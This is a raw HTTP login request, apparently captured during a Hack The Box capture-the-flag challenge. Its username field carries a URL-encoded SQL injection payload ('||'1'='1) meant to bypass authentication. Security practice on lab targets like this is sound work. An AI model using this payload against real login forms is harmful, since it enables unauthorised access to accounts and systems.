POST / HTTP/1.1
Host: docker.hackthebox.eu:30930
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://docker.hackthebox.eu:30930/
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Cookie: _ga=GA1.2.1956982976.1573267517; _gid=GA1.2.696515653.1573372170; PHPSESSID=k8sov5kjbp2ifa8kmo99p2ivq7
Connection: close
Upgrade-Insecure-Requests: 1

username=%27%7C%7C%271%27%3D%271&password=aaa